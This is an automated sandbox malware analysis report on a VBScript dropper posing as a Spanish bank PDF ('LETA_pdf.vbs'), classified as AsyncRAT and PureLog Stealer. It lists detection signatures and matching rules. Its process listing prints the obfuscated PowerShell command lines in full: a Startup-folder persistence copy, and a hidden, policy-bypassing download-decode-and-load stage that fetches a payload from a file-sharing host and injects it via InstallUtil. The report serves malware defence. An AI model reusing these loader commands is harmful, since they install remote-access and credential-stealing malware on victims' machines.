Edit tour
Windows
Analysis Report
LETA_pdf.vbs
Overview
General Information
| Sample name: | LETA_pdf.vbsrenamed because original name is a hash value |
| Original sample name: | DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919848ca5848919848484911555458_INFORMACION_COMPLETA_pdf.vbs |
| Analysis ID: | 1559694 |
| MD5: | 8825e4591cadaec1fb1d0082f84c2398 |
| SHA1: | 39fca0a522686f7b9b2b9dc5e5874aebcf231159 |
| SHA256: | 61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa |
| Infos: |   |
 | |
Detection
AsyncRAT, PureLog Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected VBS Downloader Generic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2732 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\LETA_ pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 4928 cmdline: "C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Windows \system32\ LETA_pdf.v bs', 'C:\U sers\' + [ Environmen t]::UserNa me + ''\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ sbv.JJC.v bs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
PING.EXE (PID: 1776 cmdline: ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) 
powershell.exe (PID: 1136 cmdline: powershell -command [System.IO .File]::Co py('C:\Win dows\syste m32\LETA_p df.vbs', ' C:\Users\' + [Enviro nment]::Us erName + ' '\AppData\ Roaming\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tup\ sbv.J JC.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5100 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JiggJHBTSE 9NZVs0XSsk cHNIT01FWz MwXSsnWCcp ICgoJ1BoUm ltYWdlVXJs JysnID0gZl hZaHR0cHM6 Ly8xMDE3Lm ZpbGVtYWls LmNvbS9hcG kvZicrJ2ls ZS9nZXQ/Zi crJ2lsZWtl eT0yJysnQW FfYldvOVJl dTQ1dDdCVT FrVmdzZDlw VDlwZ1NTbH ZTdEdyblRJ Q2ZGaG1US2 ozTEM2U1F0 SWNPY19UMz V3JnBrX3Zp ZD1mZDRmNj E0YmIyMDlj NjJjMTczMD k0NTE3NmEw OTA0ZiBmWF k7UGhSJysn d2ViQ2xpZW 50ID0gTmV3 LU9iamVjdC BTeXN0ZW0u TmV0LldlYk NsaWVudDtQ aFJpJysnbW FnZUJ5dGVz ID0gUGhSd2 ViQ2xpZW50 LicrJ0Rvd2 5sb2FkRGF0 YShQaFJpbW FnZVVybCk7 UGhSaW1hZ2 VUZXh0ID0g W1N5Jysnc3 RlbS5UZXh0 LkVuY28nKy dkaW5nXTo6 VVRGOC5HZX RTdHJpbmco UGhSaW1hZ2 VCeScrJ3Rl cyk7UGhSc3 RhcnQnKydG bGFnID0gZl hZPDxCQVNF NjRfU1RBUl Q+PmZYWTtQ aFJlbmRGbG FnID0gZlhZ PDwnKydCQV NFNjRfRU5E Pj5mWFk7UG hSc3RhcnRJ bmQnKydleC A9IFBoUmlt YWdlVGV4dC 5JJysnbmRl JysneE9mKF BoUnN0YXJ0 RmxhZyk7UG hSZW5kSW5k ZXggPSBQaF JpbWFnZVRl eHQuSW5kZX hPZihQaFJl bmRGbGEnKy dnKTtQaFJz dGFydEluZG V4IC1nZSAw IC1hbmQgUG hSZW5kSW5k ZXggLWd0IF BoUnN0YXJ0 SW5kZXg7UC crJ2hSc3Rh cnRJbmRleC ArPSBQaFJz JysndGFydE ZsYWcuTGVu Z3RoO1BoUm Jhc2U2NExl bmd0aCA9IF BoUmVuZElu ZGV4IC0gUG hSc3RhcnRJ bmRleDtQaF JiYXNlNjRD b21tYW5kID 0gUGhSaW1h Z2VUZXh0Ll N1YnN0cmlu ZyhQaFJzdG FydEluZGV4 JysnLCBQaF JiYXNlNjRM ZW5ndGgpO1 BoUmJhc2U2 NFJldmVyc2 VkID0gLWpv aW4gKFBoUm Jhc2U2NENv bW1hbmQuVG 9DaGFyQXJy YXkoKSB1TF QgRm9yRWFj aC1PYmplY3 QgeyBQaFIn KydfIH0pWy 0xLi4tKFBo UmJhc2U2NE NvbW1hbmQu TGVuZ3RoKV 07UGhSY29t bWFuZEJ5dG VzID0gW1N5 c3QnKydlbS 5Db252ZXJ0 XTo6RnJvbU Jhc2U2NFN0 cmluZyhQaF JiJysnYXNl NjRSZXZlcn NlZCk7UGhS bG9hZGVkQX NzZW1ibHkg PSBbU3lzdG VtLlJlZmxl Y3Rpb24uQX NzZW1ibHld OjpMb2FkKF BoUmNvbW1h bmRCeXRlcy k7UGhSdmFp TWV0aG9kID 0gW2RubGli LklPJysnLk hvbWVdLkdl dE1ldGhvZC hmWFlWQUlm WFkpO1BoUn ZhaU1ldGhv ZC5JbnZva2 UoUGhSbnVs bCwgQChmWF l0eHQuNzBv MWp6L2VvbS 54b2J0YWMu c2VsaWYvLz pzcHR0aGZY WSwgZlhZZG VzJysnYXRp dmFkb2ZYWS wgZlhZZGVz YXRpdmFkb2 ZYWSwgZlgn KydZZGVzYX RpdmFkb2ZY WSwgZlhZSW 5zdGFsbFV0 aWxmWFksIG ZYWWRlc2F0 aXZhZG9mWC crJ1ksIGZY WWRlc2F0aX ZhZG9mWFks ZlhZZGVzYX RpdmFkb2ZY WSxmWFlkZX NhdGl2YWRv ZlhZLGZYWW Rlc2F0aXZh ZG8nKydmWF ksZlhZZGVz YXRpdmFkb2 ZYWSxmWFlk ZXNhdGl2YW RvZlhZLGZY WTFmWFksZl hZZGVzYXRp dmFkb2ZYWS kpOycpLlJF cGxBQ0UoKF tjaEFSXTEw MitbY2hBUl 04OCtbY2hB Ul04OSksW3 N0UklOZ11b Y2hBUl0zOS kuUkVwbEFD RSgoW2NoQV JdMTE3K1tj aEFSXTc2K1 tjaEFSXTg0 KSwnfCcpLl JFcGxBQ0Uo J1BoUicsJy QnKSAp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3960 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "&( $p SHOMe[4]+$ psHOME[30] +'X') (('P hRimageUrl '+' = fXYh ttps://101 7.filemail .com/api/f '+'ile/get ?f'+'ileke y=2'+'Aa_b Wo9Reu45t7 BU1kVgsd9p T9pgSSlvSt GrnTICfFhm TKj3LC6SQt IcOc_T35w& pk_vid=fd4 f614bb209c 62c1730945 176a0904f fXY;PhR'+' webClient = New-Obje ct System. Net.WebCli ent;PhRi'+ 'mageBytes = PhRwebC lient.'+'D ownloadDat a(PhRimage Url);PhRim ageText = [Sy'+'stem .Text.Enco '+'ding]:: UTF8.GetSt ring(PhRim ageBy'+'te s);PhRstar t'+'Flag = fXY<<BASE 64_START>> fXY;PhRend Flag = fXY <<'+'BASE6 4_END>>fXY ;PhRstartI nd'+'ex = PhRimageTe xt.I'+'nde '+'xOf(PhR startFlag) ;PhRendInd ex = PhRim ageText.In dexOf(PhRe ndFla'+'g) ;PhRstartI ndex -ge 0 -and PhRe ndIndex -g t PhRstart Index;P'+' hRstartInd ex += PhRs '+'tartFla g.Length;P hRbase64Le ngth = PhR endIndex - PhRstartI ndex;PhRba se64Comman d = PhRima geText.Sub string(PhR startIndex '+', PhRba se64Length );PhRbase6 4Reversed = -join (P hRbase64Co mmand.ToCh arArray() uLT ForEac h-Object { PhR'+'_ } )[-1..-(Ph Rbase64Com mand.Lengt h)];PhRcom mandBytes = [Syst'+' em.Convert ]::FromBas e64String( PhRb'+'ase 64Reversed );PhRloade dAssembly = [System. Reflection .Assembly] ::Load(PhR commandByt es);PhRvai Method = [ dnlib.IO'+ '.Home].Ge tMethod(fX YVAIfXY);P hRvaiMetho d.Invoke(P hRnull, @( fXYtxt.70o 1jz/eom.xo btac.selif //:sptthfX Y, fXYdes' +'ativadof XY, fXYdes ativadofXY , fX'+'Yde sativadofX Y, fXYInst allUtilfXY , fXYdesat ivadofX'+' Y, fXYdesa tivadofXY, fXYdesativ adofXY,fXY desativado fXY,fXYdes ativado'+' fXY,fXYdes ativadofXY ,fXYdesati vadofXY,fX Y1fXY,fXYd esativadof XY));').RE plACE(([ch AR]102+[ch AR]88+[chA R]89),[stR INg][chAR] 39).REplAC E(([chAR]1 17+[chAR]7 6+[chAR]84 ),'|').REp lACE('PhR' ,'$') )" MD5: 04029E121A0CFA5991749937DD22A1D9) - InstallUtil.exe (PID: 6284 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| Click to see the 2 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||